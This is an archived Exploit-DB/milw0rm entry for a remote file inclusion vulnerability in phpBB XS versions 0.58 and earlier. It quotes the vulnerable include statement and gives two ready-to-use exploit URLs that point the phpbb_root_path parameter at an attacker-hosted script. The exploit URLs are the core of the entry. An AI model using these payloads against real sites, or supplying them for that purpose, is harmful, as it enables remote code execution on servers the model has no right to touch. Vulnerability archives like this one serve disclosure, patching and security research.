exploit-db-mirror/exploits/php/webapps/2453.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
1 KiB
Text

###########################################################
#phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)
############################################################
#Author: XORON - SHiKaA
############################################################
#URL: http://www.comscripts.com/jump.php?action=script&id=1082
############################################################
#Class: Remote
############################################################
#Code: include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx);
############################################################
#Exploit:
http://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://evil_scripts?
http://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://evil_scripts?
############################################################
#Greetz: str0ke and AzzCoder ;)
############################################################
# milw0rm.com [2006-09-28]